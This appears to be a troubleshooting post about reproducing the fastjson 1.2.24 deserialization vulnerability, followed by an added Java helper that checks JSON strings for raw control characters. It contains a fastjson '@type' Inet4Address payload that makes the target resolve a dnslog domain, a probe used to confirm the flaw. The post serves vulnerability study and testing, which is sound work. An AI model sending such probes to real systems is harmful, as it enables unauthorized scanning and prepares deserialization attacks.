The following error occurred while reproducing the fastjson 1.2.24 vulnerability:
Exception in thread "main" com.alibaba.fastjson.JSONException: deserialize inet adress error
at com.alibaba.fastjson.serializer.MiscCodec.deserialze(MiscCodec.java:303)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:368)
at com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:517)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1327)
at com.alibaba.fastjson.parser.DefaultJSONParser.parse(DefaultJSONParser.java:1293)
at com.alibaba.fastjson.JSON.parse(JSON.java:137)
at com.alibaba.fastjson.JSON.parse(JSON.java:128)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:201)
at sec.Fastjson4.main(Fastjson4.java:11)
Caused by: java.net.UnknownHostException: aaa.rvb105.dnslog.cn
at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:929)
at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1324)
at java.net.InetAddress.getAllByName0(InetAddress.java:1277)
at java.net.InetAddress.getAllByName(InetAddress.java:1193)
at java.net.InetAddress.getAllByName(InetAddress.java:1127)
at java.net.InetAddress.getByName(InetAddress.java:1077)
at com.alibaba.fastjson.serializer.MiscCodec.deserialze(MiscCodec.java:301)
... 8 more
Process finished with exit code 1
Solution:
- Check that the JSON string used in the test is well-formed; it must not contain illegal characters such as \n or \t.
Standard form:
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
String json1 = "{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.rvb105.dnslog.cn\"}}";
JSONObject jsonObject = JSON.parseObject(json1);
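
An added example, not from the original post: a small JDK-only check that lists raw control characters (such as a literal tab or newline) inside JSON string values, which RFC 8259 requires to be escaped. The class and method names are hypothetical, and the second sample string is constructed.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper (not part of fastjson): reports raw control characters
// (U+0000..U+001F) found inside JSON string values. RFC 8259 requires these
// to be escaped; whitespace between tokens is legal and is ignored here.
public class JsonControlCharCheck {

    static List<String> findRawControlChars(String json) {
        List<String> findings = new ArrayList<>();
        boolean inString = false;  // between an opening and a closing quote
        boolean escaped = false;   // previous character was a backslash
        for (int i = 0; i < json.length(); i++) {
            char c = json.charAt(i);
            if (!inString) {
                if (c == '"') inString = true;
                continue;
            }
            if (c < 0x20) {
                // Raw control character inside a string is never valid JSON.
                findings.add(String.format("offset %d: raw U+%04X inside a string", i, (int) c));
                escaped = false;
                continue;
            }
            if (escaped) {
                escaped = false;       // this character completes the escape
            } else if (c == '\\') {
                escaped = true;
            } else if (c == '"') {
                inString = false;
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        // First sample: the string from the page. Second sample (constructed):
        // the same string with a raw tab and newline after the host name, as
        // happens when "\t" or "\n" is typed inside the Java literal.
        String good = "{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.rvb105.dnslog.cn\"}}";
        String bad = "{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.rvb105.dnslog.cn\t\n\"}}";
        System.out.println("good: " + findRawControlChars(good));
        System.out.println("bad:  " + findRawControlChars(bad));
    }
}
```

An empty list means no string value contains a raw control character; each finding gives the character offset to fix in the test string.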